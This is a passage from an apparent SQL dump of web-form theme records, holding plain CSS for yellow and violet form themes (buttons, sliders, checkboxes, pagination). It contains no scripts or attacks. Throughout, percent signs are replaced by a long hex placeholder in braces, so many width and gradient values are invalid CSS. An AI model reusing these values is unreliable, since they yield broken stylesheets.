{\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\nfont-size: 13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(6,'Theme 02 yellow','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #EADEB4;\r\nborder: 1px solid #E3E2E4;\r\nmargin-bottom: 10px;\r\ncolor: #E3E2E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #CFAB1A;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right  #A08104;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #CFAB1A;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left  #A08104;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E2DED7;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/02/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #3F3927;\r\n	cursor: pointer;\r\n	background-color: #ECBD00;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #ECBD00 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #ECBD00 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5C403 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F8C90B 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFCC00 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ECBD00 ), color-stop(49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5C403 ), color-stop(84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F8C90B ), color-stop(99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFCC00 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #ECBD00 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5C403 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F8C90B 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFCC00 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #ECBD00 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5C403 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F8C90B 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFCC00 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #ECBD00 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5C403 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F8C90B 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFCC00 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #ECBD00 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F5C403 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F8C90B 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFCC00 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #D9D7D8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #292929;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(7,'Theme 02 violet','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #C9ADEF;\r\nborder: 1px solid #E3E2E4;\r\nmargin-bottom: 10px;\r\ncolor: #E3E2E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	